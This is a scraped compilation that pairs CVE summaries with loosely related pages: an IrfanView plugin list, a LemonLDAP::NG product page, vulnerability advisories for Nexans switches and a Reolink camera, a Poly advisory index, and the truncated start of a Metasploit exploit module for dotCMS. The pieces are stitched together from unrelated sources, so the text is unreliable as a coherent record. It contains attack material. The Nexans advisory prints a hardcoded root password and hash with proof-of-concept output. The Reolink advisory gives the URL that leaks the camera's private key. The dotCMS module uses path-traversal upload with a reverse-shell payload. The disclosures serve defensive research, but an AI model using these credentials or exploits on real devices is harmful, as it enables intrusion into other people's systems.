IrfanView 4.54 allows a user-mode write access violation starting at FORMATS!ShowPlugInSaveOptions_W+0x0000000000002cba.

**Please always use the current IrfanView and PlugIn version.**

  
**How to install IrfanView PlugIns?**

1.  Download all PlugIns, see below
2.  Click on the PlugIn file (irfanview\_plugins\_XYZ\_setup.exe)
3.  PlugIns will be installed into IrfanView "PlugIns" directory 

**Note:** Install 32-bit PlugIns to IrfanView-32 and 64-bit PlugIns to IrfanView-64 folder. **DO NOT** mix the PlugIns and IrfanView bit versions. 

**The current PlugIns version is: 4.60** 

**Note:** A normal IrfanView version includes the following (most important) PlugIns: **Effects, Paint, Icons, Slideshow-EXE, RegionCapture, JPG-Transform, Video, Metadata, Tools.**

  **Check the 64-bit page for 64-bit PlugIns.**  

1.  **You can download ALL (32-bit) PlugIns as one large EXE (recommended):**  **FossHub - download IrfanView plugins Installer**
    
    Alternative download site: iview460\_plugins\_setup.exe (20.2 MB, installer)  
    (SHA-256 checksum: 0a967a007c296944575962e66586bfada7c32012675dc1a0ae1cec982bb755f8)
    
  
3.  **You can download ALL (32-bit) PlugIns as one large ZIP (for experienced users!):**  **FossHub - download IrfanView plugins ZIP**
    
    Alternative download site: iview460\_plugins.zip (18.4 MB)  
    (SHA-256 checksum: 628a088067c0e4baf02ab87698fc0bf66b2b59cb1eee9ff08c95535e741cd654)
    

**Special PlugIn: "IrfanView Shell Extension":**

This PlugIn shows a **Context menu for some IrfanView operations in Windows Explorer or other file managers.**   
You can select several files and: Play slideshow, Load files in Thumbnails window, Start JPG Lossless Rotation, Convert images to another format, Save filenames as TXT, Create multipage TIF or PDF, Create panorama image. (current version: 1.06)

Download: https://www.irfanview.net/plugins/irfanview\_shell\_extension\_plugin.exe (Installer)  
(SHA-256 checksum: b9828e236b26626b46fe20ad31208140fc572819ba86c2cba75cbd2c7724ebef)

or 

https://www.irfanview.net/plugins/irfanview\_shell\_extension.zip (ZIP, for experienced users!)  
(SHA-256 checksum: 2112f85a917b2eca90eaa047a8c3b22e0157f13e83971aee679d955b2ff1047d)

**You can download the (32-bit) PlugIns as 4 separate ZIP files (for experienced users!):**

1.  iv\_mmedia.zip. Contains these PlugIns: IV\_Player, Med, Mp3, Burning, Nero, Quicktime, Real Audio, SoundPlayer.
2.  iv\_formats.zip.  Contains these PlugIns: Awd, B3d, BabaCAD4Image, CamRAW, Crw, CADImage, Dicom, DjVu, Dpx, Ecw, Exr, Flash, Flif, Formats, Fpx, Hdp, Ics, ImPDF, ImPDN, JPEG2000, Jpeg\_LS, Jpm, Mng, MrSID, PDF, PhotoCD, OptiPNG, Postscript, Sff, Svg, Wbz, WebP, Wsq, Xcf.
3.  iv\_effects.zip.   Contains these PlugIns: Filter Sandbox, Film Simulation, Filter Factory, Filters Unlimited.
4.  iv\_misc.zip.      Contains these PlugIns: Email, FaceDetect, Ftp, Lcms.

**PlugIns updated after the version 4.60:**

*   CamRAW Plugin (4.60) - ZIP (32 bit) or ZIP (64 bit) - Support for Olympus OM-1 RAW format

**Available PlugIns and current versions:**

*   **AltaLux** - (version **1.08**): allows IrfanView to use AltaLux image effect
*   **AWD** - (version **2.0.0.0**): allows IrfanView to read Artweaver files
*   **B3D** - (version **4.56**): allows IrfanView to read BodyPaint 3D files
*   **BabaCAD4Image** - (version **1.3.2**): allows IrfanView to to read DXF and DWG CAD files
*   **BURNING** - (version **4.51**): allows IrfanView to burn slideshow to a CD/DVD/BD (Windows XP SP3 or later required)
*   **BURNINGOLD** - (version **4.36**): allows IrfanView (32-bit) to burn slideshow to a CD (Windows XP or later required, Nero option can burn Data DVD and VCD)
*   **CADImage** - (version **14.0.0.1**): allows IrfanView to read DXF/DWG/HPGL/CGM/SVG files (Shareware, third party plugin)  
    Newest 32-bit versions under: https://www.cadsofttools.com/download/irfanviewplugins.zip , newest 64-bit versions: https://www.cadsofttools.com/download/irfanviewplugins\_x64.zip
*   **CamRAW** - (version **4.58**): allows IrfanView to to read Digital Camera RAW files  
    (formats: DNG, EEF, NEF, ORF, RAF, MRW, DCR, SRF/ARW, PEF, X3F)
*   **CRW** - (version **4.58**): allows IrfanView (32-bit) to read Canon CRW/CR2 files (high resolution image version) **  
    Note:** this PlugIn requires additional Canon DLLs. You can download these DLLs with the Canon ZoomBrowser program: https://www.canon.com/ or try here: https://www.irfanview.info/plugins/canon\_crw.zip (check "Readme.txt" for instructions and install!)
*   **DICOM** - (version **4.60**): allows IrfanView to read Dicom formats (DCM, ACR, IMA)
*   **DJVU** - (version **4.56**): allows IrfanView to read DJVU format
*   **DPX** - (version **4.56**): allows IrfanView to read DPX/CIN (Digital Picture Exchange/Cineon) format
*   **ECW** - (version **4.56**): allows IrfanView to read/write ECW files (Enhanced Compressed Wavelet)
*   **EFFECTS** - (version **4.59**): contains image effects and allows IrfanView to load Adobe Photoshop 8BF filters **Note:** some nice (fixed menu) Adobe 8BF Plugins/effects can be downloaded/installed from: https://www.irfanview.net/plugins/irfanview\_adobe\_8bf\_plugins.exe (Installer) or https://www.irfanview.net/plugins/irfanview\_adobe\_8bf\_plugins.zip **  
    Note:** some older/special 8BFs may require additional system DLLs: Msvcrt10.dll and/or Plugin.dll. You can download these DLLs here: https://www.irfanview.info/plugins/8bf\_tools.zip (check "Readme.txt" for instructions and install!)
*   **EMAIL** - (version **4.59**): allows IrfanView to send images as emails
*   **EXR** - (version **4.56**): allows IrfanView to read EXR files
*   **FACEDETECT** - (version **2.00**): allows IrfanView to use the Face Detection feature from Thumbnails window  
    If you have a modern graphic card which can be used for additional calculations, you can try the GPU version of the plugin: https://www.irfanview.info/plugins/facedetect\_gpu.zip
*   **FILM\_SIMULATION** - (version **1.0.0.0**): allows IrfanView to apply some Film Simulation effects **  
    Note:** this PlugIn needs additional CLUT files, download/install from: https://www.irfanview.net/plugins/irfanview\_film\_sim\_plugin.zip
*   **FILTER\_FACTORY** - (version **4.53**): allows IrfanView to use Filter Factory 8BF files (Photoshop PlugIns)
*   **FLASH** - (version **2.2.0.1**): allows IrfanView to read Flash/Shockwave/FLV format
*   **FLIF** - (version **4.56**): allows IrfanView to read FLIF (Free Lossless Image) format
*   **FORMATS** - (version **4.60**): allows IrfanView to read some rare image formats  
    (formats: PCX, QOI, PSP, DDS, G3, RAS, IFF/LBM, BioRAD, Mosaic, XBM, XPM, GEM-IMG, SGI, RLE, WBMP, TTF, FITS, PIC, MAG, WAD, WAL, CAM, SFW, YUV, PVR, SIF and old/retro formats from Amiga, Atari, C64, ZX Spectrum etc.)
*   **FPX** - (version **4.56**): allows IrfanView (32-bit) to read FlashPix files
*   **FTP** - (version **4.50**): allows IrfanView to transfer files from Thumbnails window using FTP
*   **FILTERS\_UNLIMITED** - (version **3.20**): allows IrfanView (32-bit) to use Filters Unlimited files (Photoshop PlugIns and filters)
*   **HDP** - (version **4.56**): allows IrfanView to read Jpeg-XR/HDP/WDP (Microsoft HD Photo) files
*   **ICONS** - (version **4.30**): additional icons for IrfanView file associations
*   **ICS** - (version **4.56**): allows IrfanView (32-bit) to read ICS files (Image Cytometry Standard)
*   **IMPDF** - (version **0.90**): allows IrfanView (32-bit) to write PDF files (Portable Document Format)
*   **IMPDN** - (version **1.16**): allows IrfanView to read PDN files (Paint.NET File Format)
*   **IRFANVIEW\_SANDBOX** - (version **1.3.0.14**): allows IrfanView to use JewelScript Effects/Filters
*   **IV\_PLAYER** - (version **4.54**): allows IrfanView to play video/sound/audio-cd files using Windows Media Player
*   **JPEG2000** - (version **4.56**): allows IrfanView to read/write JPEG 2000 files
*   **JPEG\_LS** - (version **4.56**): allows IrfanView to read/write JPEG-LS files
*   **JPEG\_XL** - (version **4.59.1**): allows IrfanView to read/write JPEG-XL files
*   **JPEGQS** - (version **2020-05-17**): allows IrfanView to read JPG files using QuantSmooth method
*   **JPG\_TRANSFORM** - (version **4.59**): allows IrfanView to support lossless JPG operations (rotation/crop/cleaning, EXIF date editing, EXIF thumb update)
*   **JPM** - (version **4.56**): allows IrfanView to read/write JPM files
*   **LCMS** - (version **4.58**): allows IrfanView to use color management
*   **MED** - (version **3.31**): allows IrfanView (32-bit) to play MED/OctaMED audio files
*   **METADATA** - (version **4.60**): allows IrfanView to handle EXIF/IPTC/Comment information from compatible files
*   **MNG** - (version **4.57**): allows IrfanView to read/play MNG/JNG files
*   **MP3** - (version **4.52**): allows IrfanView to play MP3/MP2/MP1 files
*   **MRC** - (version **3.70**): allows IrfanView (32-bit) to read MRC files
*   **MR-SID** - (version **4.56**): allows IrfanView to read LizardTech's SID files **  
    Note:** this PlugIn needs additional DLLs (for IrfanView 32-bit only), download/install from: https://www.irfanview.net/plugins/irfanview\_mrsid\_plugin.exe (Installer) or https://www.irfanview.net/plugins/irfanview\_mrsid\_plugin.zip
*   **NERO** - (version **4.20**): allows IrfanView (32-bit) to burn slideshow to data or Video CD, using Nero Burning ROM software
*   **OCR\_KADMOS** - (version **4.4y**): adds OCR features to IrfanView PlugIn download: https://www.irfanview.info/plugins/kadmos/**  
    Note: the OCR PlugIn works only with IrfanView 32-bit.**
*   **OPTIPNG** - (version **4.59**): this PlugIn allows optimized PNG saving
*   **PAINT** - (version **0.4.13.57**): allows IrfanView to to paint lines, circles, arrows, straighten image etc.
*   **PDF** - (version **4.58**): allows IrfanView to read/save PDF files (Portable Document Format)
*   **PHOTO-CD** - (version **3.00**): allows IrfanView to read Kodak PCD files (high resolutions)
*   **POSTSCRIPT** - (version **4.59**): allows IrfanView to read EPS/PS/PDF files (using Ghostscript, take the **32-bit (!) EXE installer**, like "gs926w32.exe") or Ghostscript **64-bit for IrfanView 64-bit** (like "gs926w64.exe").
*   **QUICKTIME** - (version **4.56**): allows IrfanView to play/read Apple Quicktime files
*   **REAL-AUDIO** - (version **3.37**): allows IrfanView (32-bit) to play Real-Audio RA files
*   **REGIONCAPTURE** - (version **2.4.3**): allows IrfanView to capture a rectangle area of the screen
*   **SFF** - (version **4.56**): allows IrfanView to read SFF (Structured Fax) Files
*   **SLIDESHOW** - (version **4.57**): allows IrfanView to create presentations in EXE or SCR format (standalone executable/screen saver)
*   **SOUND\_PLAYER** - (version **4.39**): allows IrfanView to play OGG files (Ogg Vorbis)
*   **STUB\_LOADER** - (version **1.2.5**): allows loading of old (32 bit) PlugIns in IrfanView 64 bit (used also for scanning in IrfanView-64)
*   **SVG** - (version **0.85**): allows IrfanView to read SVG (Scalable Vector Graphic) files
*   **TOOLS** - (version **4.58**): contains some additional functions/features for IrfanView  
    (and some special formats, like: HEIC, AVIF; with installed codecs/extensions)
*   **VIDEO** - (version **4.57**): allows IrfanView to play many video/sound formats
*   **WBZ** - (version **1.01**): allows IrfanView to read WebShots (WBZ/WBC/WB1) files
*   **WEBP** - (version **4.57**): allows IrfanView to read/write WEBP (Weppy Format) files
*   **WPG** - (version **3.1.2**): allows IrfanView to read WPG (version 1) files
*   **WSQ** - (version **2019.10.15**): allows IrfanView to read WSQ (Wavelet Scaler Quantization) files
*   **XCF** - (version **0.1.4**): allows IrfanView to read XCF files

**For developers:** If you want to write your own plugins for IrfanView (support for new image formats or effects (please no private formats)), please send me an email for details.

CVE-2020-23563: IrfanView PlugIns

In LemonLDAP::NG (aka lemonldap-ng) through 2.0.8, validity of the X.509 certificate is not checked by default when connecting to remote LDAP backends, because the default configuration of the Net::LDAPS module for Perl is used.

**Full AAA protection**

LemonLDAP::NG provides **authentication** (LDAP, Active Directory, Kerberos, Database, SSL, Social Networks, CAS, SAML, OpenID Connect, ...), **authorization** (access rules for applications based on attributes and groups) and **accounting** (user identity in logs).

*   Authentication
*   Authorization
*   Accounting

**Components**

LemonLDAP::NG relies on backends (files, databases, NoSQL) to store **configuration** and **sessions**. The **Portal** is the visible part, it displays the authentication screen and the menu, implements the standard protocols (CAS, SAML and OpenID Connect). The **Manager** is the administration interface. For applications working with HTTP headers for SSO, the **Handler** can be configured.

Read full presentation

**Identity Federation**

LemonLDAP::NG implements main SSO standards and can be used as gateway between these protocols

*   **CAS**
    
    CAS v1, v2 and v3  
    Attributes sharing  
    Access rules
    
*   **SAML**
    
    SSO, SLO and AA  
    Metadata import and export  
    Discovery Protocol (WAYF)
    
*   **OpenID Connect**
    
    Authorization Code, Implicit and Hybrid flows  
    ID Token HS and RS signatures  
    Extra claims definition
    

**Certifications and awards**

CVE-2020-16093: LemonLDAP::NG - Web Single Sign On and Access Management Free Software

libnx_apl.so on Nexans FTTO GigaSwitch before 6.02N and 7.x before 7.02 implements a Backdoor Account for SSH logins on port 50200 or 50201.

All industrial managed FTTO GigaSwitch series from Nexans S.A. are affected by multiple vulnerabilities resulting from outdated software components embedded in the firmware. Hardcoded password hashes were also found in the firmware. Four known vulnerabilities (CVE-2017-16544, CVE-2015-0235, CVE-2015-7547 and CVE-2015-9261) were verified by emulating the device with the MEDUSA scalable firmware runtime.

**Vendor description**

"_As a global player in the cable industry, Nexans is behind the scenes delivering the innovative services and resilient products that carry thousands  
of watts of energy and terabytes of data per second around the world. Millions of homes, cities, businesses are powered every day by Nexans’ high-quality  
sustainable cabling solutions. We help our customers meet the challenges they face in the fields of energy infrastructure, energy resources, transport,  
buildings, telecom and data, providing them with solutions and services for the most complex cable applications in the most demanding environments._"

Source: https://www.nexans.com/company/What-we-do.html

**Business recommendation**

The vendor provides a patch which should be installed immediately.

SEC Consult recommends to perform a thorough security review of these  products conducted by security professionals to identify and resolve all security issues.

**Vulnerability overview/description****1) Outdated Vulnerable Software Components**

A static scan with the IoT Inspector (ONEKEY) revealed outdated software packages that are used in the devices' firmware. Four of them were verified by using the MEDUSA scalable firmware runtime.

**2) Hardcoded Backdoor User (CVE-2022-32985)**

A hardcoded root user was found in "/etc/passwd". In combination with the invoked dropbear SSH daemon in the libnx\_apl.so library, it can be used on port 50201 and 50200 to login on a system shell.

**Proof of concept****1) Outdated Vulnerable Software Components**

Based on an automated scan with the IoT Inspector (ONEKEY) the following third party software packages were found to be outdated:

    Firmware version 6.02L:
    BusyBox       1.20.2 
    Dropbear SSH  2012.55
    GNU glibc     2.17
    lighttpd      1.4.48
    OpenSSL       1.0.2h

The following CVEs were verified with MEDUSA scalable firmware emulation:

****CVE-2015-9261 (Unzip)****

The crafted ZIP archive "x\_6170921383890712452.bin" was taken from: https://www.openwall.com/lists/oss-security/2015/10/25/3

Execution inside the firmware emulation:

    bash-4.2# unzip x_6170921383890712452.bin 
    Archive:  x_6170921383890712452.bin
      inflating: ]3j½r«IK-%Ix
    do_page_fault(): sending SIGSEGV to unzip for invalid read access from 735ededc
    epc = 0044bb28 in busybox[400000+99000]
    ra  = 0044b968 in busybox[400000+99000]
    Segmentation fault

****CVE-2015-0235 (gethostbyname "GHOST" buffer overflow)****

PoC code was taken from: https://gist.github.com/dweinstein/66e6a088191ac0e8105c

****CVE-2015-7547 (getaddrinfo buffer overflow)****

PoC code was taken from: https://github.com/fjserna/CVE-2015-7547

    -bash-4.4# python /medusa_exploits/cve-2015-7547-poc.py &
    [1] 259
    -bash-4.4# chroot /medusa_rootfs/ bin/bash
    bash-4.2# cd /medusa_exploits/
    bash-4.2# ./cve-2015-7547_glibc_getaddrinfo
    [UDP] Total Data len recv 36
    [UDP] Total Data len recv 36
    Connected with 127.0.0.1:34356
    [TCP] Total Data len recv 76
    [TCP] Request1 len recv 36
    [TCP] Request2 len recv 36
    Segmentation fault

****CVE-2017-16544 (shell autocompletion vulnerability)****

A file with the name "\\ectest\\n\\e\]55;test.txt\\a" was created to trigger the vulnerability.

    # ls "pressing <TAB>"
    test
    ]55;test.txt
    #

**2) Hardcoded Backdoor User (CVE-2022-32985)**

The hardcoded system user, reachable via the dropbear SSH daemon was found due to multiple indications on the system. The undocumented root user itself was contained in the "passwd" file:  

Content of the file "/etc/passwd".

    root:oFQzvQf5qrI56:0:0:root:/home/root:/bin/sh
    [...]

Update: The password for the root user is: !Nexans\_

A suspicious port for the SSH daemon was chosen in the config file of dropbear: 

Content of the file "/etc/init.d/dropbear":

    PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
    DAEMON=/usr/sbin/dropbear
    NAME=dropbear
    DESC="Dropbear SSH server"
    PIDFILE=/var/run/dropbear.pid
    
    DROPBEAR_PORT="50200 -p 50201"
    [...]

This is invoked from "/usr/lib/libnx\_apl.so.0.0.0", which can be seen in the  following pseudo-code:

    void dropbear_server_init(char param_1)
    
    {
      __pid_t __pid;
      char *pcVar1;
      int aiStack16 [2];
      
      __pid = fork();
      if (__pid == 0) {
        __pid = fork();
        if (__pid != 0) {
                        /* WARNING: Subroutine does not return */
          exit(0);
        }
        if (param_1 == '\0') {
          pcVar1 = "/etc/init.d/dropbear stop";
        }
        else {
          pcVar1 = "/etc/init.d/dropbear start";                               <---
        }
        execl("/bin/sh","sh",&DAT_2cd91564,pcVar1,0);
      }
      else {
        waitpid(__pid,aiStack16,0);
      }
      return;
    }

This function is called if a specific command is issued in the CLI interface:

    [...]
      iVar6 = telnet_cmp_command((char *)(param_3 + 0xf2),"ssh",2);
      if (iVar6 != 0) {
        if (param_2 < 4) {
          netbuf_fwd_sprintf(param_1,"\r\n%%Error: Parameter missing\r\n");
          iVar6 = shared_mem_get_addr(&var_shm);
          iVar7 = shared_mem_get_addr(&var_shm);
          uVar8 = shared_mem_read_u8(&var_shm,iVar7 + 0x161a);
          shared_mem_write_u8(&var_shm,iVar6 + 0x161a,uVar8 & 0xff | 0x10);
          return;
        }
        iVar6 = telnet_cmp_command((char *)(param_3 + 0x16b),"start",1);
        if (iVar6 != 0) {
          dropbear_server_init('\x01');                                        <---
          netbuf_fwd_sprintf(param_1,"Starting dropbear...\r\n");
          return;
        }
        iVar6 = telnet_cmp_command((char *)(param_3 + 0x16b),"stop",1);
        if (iVar6 != 0) {
          dropbear_server_init('\0');                                          <---
          netbuf_fwd_sprintf(param_1,"Stopping dropbear...\r\n");
          return;
        }
        netbuf_fwd_sprintf(param_1,"Uknown dropbear command...\r\n");
        return;
    [...]

The mentioned library is used in the CLI program that is running on the device.

**Vulnerable / tested versions**

The following firmware versions have been tested:

*   Nexans FTTO GigaSwitch HW Version 5 (all industrial/office switches) / Firmware 6.02L
*   Nexans FTTO GigaSwitch HW Version 5 (all industrial/office switches) / Firmware 5.04M

**Vendor contact timeline**

CVE-2022-32985: Hardcoded Backdoor User and Outdated Software Components in Nexans FTTO GigaSwitch series

An issue was discovered in Poly EagleEye Director II before 2.2.2.1. os.system command injection can be achieved by an admin.

DATE

ID#

TITLE

03-07-22

PLYTV21-09

Studio X50 – Improper Neutralization of Special Elements used in an OS Command

03-07-22

PLYPL21-12

EEDII – Multiple Security Vulnerabilities

02-23-22

PLYGN21-08

Poly Systems – Apache Log4j

09-29-21

Security Advisory Version 1.0

Plantronics Hub – Local Privilege Escalation

09-07-21

Security Bulletin Version 1.0

CX5100/CX5500 Authenticated Command Injection

04-30-21

Security Advisory Version 1.0

Information Disclosure Vulnerability Poly VOIP Phones

02-24-21

Security Advisory Version 1.0

Information Disclosure Vulnerability Poly VOIP Phones

02-24-21

Security Bulletin Version 1.1

Increased SIP Provisioning Attacks

02-22-21

Security Advisory Version 1.0

Information Disclosure Vulnerability Poly ZTP Service

01-20-21

Security Bulletin Version 1.0

Cybersecurity and Infrastructure Security Agency (CISA) Alert AA20-352A

04-24-20

Security Bulletin Version 1.0

Poly Recommended Best Security Practices for Unified Communications

04-01-20

Security Advisory Version 1.0

Poly Voice Endpoints – XSS and CSRF Vulnerabilities

02-07-20

Security Bulletin Version 1.0

CCX500 - UI Vulnerability Allows Access to Android Settings

01-15-20

Security Bulletin Version 1.6

Worldwide H.323 and SIP Botnet Calling Video Systems

01-10-20

Security Advisory Version 1.2.0

Remote Code Execution Vulnerability in UCS Software

01-10-20

Security Advisory Version 1.0.0

Vulnerabilities in VxWorks Operating System and Poly Products

09-04-19

Security Advisory Version 1.0.0

Plantronics Hub - Local Privilege Escalation Vulnerability

08-06-19

Security Advisory Version 1.0

Remote Code Execution Vulnerability in Obihai OBi1022

06-19-19

Security Advisory Version 1.1

Insufficient Authentication Resulting in Information Leakage on VVX Products

06-14-19

Security Advisory Version 1.1

Hard Coded Credentials Vulnerability in VVX Products

04-26-19

Security Advisory Version 1.0

Multiple Vulnerabilities in HDX Products Older than 3.1.14

02-20-19

Security Bulletin Version 1.0

HDX (versions older than 3.1.13) can be affected by multiple Botnets

01-24-19

Security Advisory Version 1.1

Cyber Threats Targeting Default Passwords

11-30-18

Security Bulletin Version 1.1

TLS 1.2 and Microsoft O365 Impacts to Polycom Products

11-05-18

Security Bulletin Version 1.0

Bluetooth Authentication Weakness Found in Trio

11-05-18

Security Bulletin Version 1.0

Stored Cross-Site Scripting Found in Trio

11-01-18

Security Bulletin Version 1.0

Remote Code Execution Vulnerability Found in Group Series

08-10-18

Security Bulletin Version 1.1

HDX SoftwareVersions Older than 3.1.12 and Omni Botnet

07-12-18

Security Advisory Version 1.9

Processor Based "Speculative Execution" Vulnerabilities AKA "Spectre" and "Meltdown" on Polycom Products

07-11-18

Security Advisory Version 1.2

Vulnerabilities in Polycom VVX Phones and UC Software

07-03-18

Security Advisory Version 1.0

Polycom UCS Software Vulnerabilities

06-26-18

Security Advisory Version 1.1

RealPresence Web Suite Vulnerability

05-10-18

Security Advisory Version 1.0

RealPresence Debut Vulnerabilities

03-05-18

Security Advisory Version 1.0

QDX 6000 Vulnerabilities

12-20-17

Security Advisory Version 1.2

"Krack" Vulnerability with Polycom Products

11-24-17

Security Advisory Version 1.2

Remote Code Execution on HDX Endpoints

10-18-17

Security Advisory Version 1.1

BlueBorne Bluetooth Vulnerabilities

08-28-17

Security Advisory Version 1.0

Information Disclosure on Multiple Polycom Products

08-11-17

Security Bulletin Version 1.1

WannaCry Vulnerability and Polycom Products

06-14-17

Security Bulletin Version 1.0

Relating to CVE-2017-7494 "SambaCry" Vulnerability and Polycom Products

03-22-17

Security Bulletin Version 1.0

Relating to CVE-2017-5638 "Apache Struts" Vulnerability and Polycom Products

10-26-16

Security Advisory Version 1.1

Relating to CVE-2016-5195 "Dirty COW" Vulnerability

09-20-16

Security Advisory Version 2.0

Relating to a Cross-site Scripting (XSS) Vulnerability in Polycom HDX Video Endpoints

09-13-16

Security Advisory Version 1.0

Relating to an XML External Entity (XXE) Vulnerability in Polycom HDX Video Endpoints)

04-06-16

Security Advisory Version 1.2

Relating to a GNU glibc DNS Vulnerability (CVE-2015-7547)

03-08-16

Security Bulletin Version 1.0

Relating to CVE-2016-0800 “DROWN” Vulnerability and Polycom Products

02-09-16

Security Office Update 2.0

Security Update Relating to H.323 and SIP AES Media Encryption on Polycom Products

12-16-15

Security Advisory Version 1.0

Relating to RealPresence Capture Server and RealPresence Media Suite Appliance Editions

12-09-15

Security Advisory Version 1.0

Relating to Path Traversal Vulnerabilities in Polycom VVX Business Media Phones

10-23-15

Security Advisory Version 2.0

Relating to GHOST glibc Vulnerability

10-23-15

Security Advisory Version 1.6.1

Relating to Logjam Vulnerability

06-29-15

Security Bulletin Version 1.0

RealPresence Resource Manager 8.4 security fixes summary

06-23-15

Security Advisory Version 1.0

Relating to Command Shell Vulnerability in Polycom Group Series Video Endpoints

06-23-15

Security Advisory Version 1.0

Relating to Inadequate SSH Restrictions Vulnerability in Polycom Group Series Video Endpoints

06-23-15

Security Advisory Version 1.0

Relating to Software Update Vulnerability in Polycom Group Series Video Endpoints

06-23-15

Security Advisory Version 1.0

Relating to Weak Entropy Vulnerability in Polycom Group Series Video Endpoints Web Cookies

06-17-15

Security Bulletin Version 1.0

Relating to "Tomcat Denial of Service"

06-15-15

Security Bulletin Version 1.0

Relating to Leap Second Insertion

04-20-15

Security Bulletin Version 1.6

Relating to SSLv3 "POODLE" Vulnerability and Polycom Products

10-24-14

Security Advisory Version 1.7

Relating to Bash shell arbitrary code execution on Various Polycom Products

10-06-14

Security Bulletin Version 1.2

Relating to Multiple OpenSSL Vulnerabilities on Various Polycom Products

06-05-14

Security Advisory Version 1.12

Relating to OpenSSL Vulnerability “Heartbleed” on Various Polycom Products

12-20-13

Security Bulletin 5471

Relating to JBoss Application Server on RealPresence Resource Manager

03-14-13

Security Bulletin 102404

Security Advisory relating to telnet shell authorization bypass on Polycom HDX Video Endpoints

03-14-13

Security Bulletin 107522

Security Advisory Relating to the Firmware Update Command Injection Vulnerability on Polycom HDX Video Endpoints

03-14-13

Security Bulletin 107523

Security Advisory Relating to the Command Shell Vulnerability on Polycom HDX Video Endpoints

03-14-13

Security Bulletin 107524

Security Advisory Relating to the H.323 Format String Vulnerability on Polycom HDX Video Endpoints

03-14-13

Security Bulletin 107525

Security Advisory Relating to the H.323 CDR Database SQL Injection on Polycom HDX Video Endpoints

03-14-13

Security Bulletin 107526

Security Advisory Relating to the PUP File Header MAC Signature Bypass on Polycom HDX Video Endpoints

CVE-2022-26482: Security Center

Pexip Infinity before 28.1 allows remote attackers to trigger a software abort via G.719.

CVE-2022-32263: Pexip security bulletins | Pexip Infinity Docs

The web server of the E1 Zoom camera through 3.0.0.716 discloses its SSL private key via the root web server directory. In this way an attacker can download the entire key via the /self.key URI.

Permalink

Cannot retrieve contributors at this time

RCE Security Advisory

https://www.rcesecurity.com

1\. ADVISORY INFORMATION

\=======================

Product: Reolink E1 Zoom Camera

Vendor URL: https://reolink.com/product/e1-zoom/

Type: Exposure of Sensitive Information to an Unauthorized Actor \[CWE-200\]

Date found: 2021-08-26

Date published: 2022-06-01

CVSSv3 Score: 7.5 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)

CVE: CVE-2021-40149

2\. CREDITS

\==========

This vulnerability was discovered and researched by Julien Ahrens from

RCE Security.

3\. VERSIONS AFFECTED

\====================

Reolink E1 Zoom Camera 3.0.0.716 (latest) and below

4\. INTRODUCTION

\===============

Meet new generation of Reolink E1 series. Advanced features - 5MP Super

HD & optical zoom are added into this compact camera. Plus two-way audio,

remote live view and more smart capacities help you connect with what you

care. Be closer to families and be away from worries.

(from the vendor's homepage)

5\. VULNERABILITY DETAILS

\========================

The web server of the E1 Zoom camera through 3.0.0.716 discloses its SSL private

key via the root web server directory.

An unauthenticated attacker can abuse this with network-level access to the

camera to download the webserver's private SSL key by simply going to the

following URL:

http://\[CAM-IP\]/self.key

6\. RISK

\=======

An unauthenticated attacker can download the webserver's SSL private key and

thereby attack the encrypted network traffic to and from the camera, which might

lead to the disclosure of the administrative access credentials and other

sensitive information.

7\. SOLUTION

\===========

None.

8\. REPORT TIMELINE

\==================

2021-08-26: Discovery of the vulnerability

2021-08-26: Sent notification to Reolink via their support channel

2021-08-26: Response from vendor asking for vulnerability details

2021-08-26: Sent all the vulnerability details

2021-08-31: Vendor is still looking into the issue

2021-09-03: Vendor states that the issue will be fixed by the end of September.

2021-10-01: Since no firmware has been released, we've sent another notification

2021-10-02: Vendor states that the new firmware is delayed

2022-02-01: Since there is still fix, sent another notification

2022-02-02: Vendor states that the firmware with the fix hasn't been released yet.

2022-03-03: Since there is still fix, sent another notification

2022-03-12: Vendor states they're still working on the issue (internal update awaits testing)

2022-05-24: Since there is still fix, sent another notification

2022-05-24: Vendor states that the update still hasn't been released yet.

2022-06-01: Almost a year should be enough to fix this. Public disclosure.

9\. REFERENCES

\=============

https://github.com/MrTuxracer/advisories

CVE-2021-40149: advisories/CVE-2021-40149.txt at master · MrTuxracer/advisories

An issue was discovered in the ContentResource API in dotCMS 3.0 through 22.02. Attackers can craft a multipart form request to post a file whose filename is not initially sanitized. This allows directory traversal, in which the file is saved outside of the intended storage location. If anonymous content creation is enabled, this allows an unauthenticated attacker to upload an executable file, such as a .jsp file, that can lead to remote code execution.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::FileDropper  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'DotCMS RCE via Arbitrary File Upload.',        'Description' => %q{          When files are uploaded into dotCMS via the content API, but before they become content, dotCMS writes the          file down in a temp directory.  In the case of this vulnerability, dotCMS does not sanitize the filename          passed in via the multipart request header and thus does not sanitize the temp file's name.  This allows a          specially crafted request to POST files to dotCMS via the ContentResource (POST /api/content)  that get          written outside of the dotCMS temp directory.  In the case of this exploit, an attacker can upload a special          .jsp file to the webapp/ROOT directory of dotCMS which can allow for remote code execution.        },        'Author' => [          'Shubham Shah',  # Discovery and analysis          'Hussein Daher', # Discovery and analysis          'jheysel-r7'     # Metasploit module        ],        'License' => MSF_LICENSE,        'References' => [          ['CVE', '2022-26352'],          ['URL', 'https://blog.assetnote.io/2022/05/03/hacking-a-bank-using-dotcms-rce/']        ],        'Privileged' => false,        'Platform' => %w[linux win],        'Targets' => [          [            'Java Linux',            {              'Arch' => ARCH_JAVA,              'Platform' => 'linux'            }          ],          [            'Java Windows',            {              'Arch' => ARCH_JAVA,              'Platform' => 'win'            }          ]        ],        'DisclosureDate' => '2022-05-03',        'DefaultTarget' => 0,        'DefaultOptions' => {          'SSL' => true,          'PAYLOAD' => 'java/jsp_shell_reverse_tcp'        },        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]        }      )    )    register_options([      Opt::RPORT(8443),      OptString.new('TARGETURI', [true, 'Base path', '/'])    ])  end  def check    test_content = Rex::Text.rand_text_alpha(10)    test_file = "#{test_content}.jsp"    test_path = "../../#{test_file}"    uuid = Faker::Internet.uuid    jsp = <<~EOS      <%@ page import=\"java.io.File\" %>      <%        File jsp=new File(getServletContext().getRealPath(File.separator) + File.separator + "#{test_file}");        jsp.delete();      %>      #{uuid}    EOS    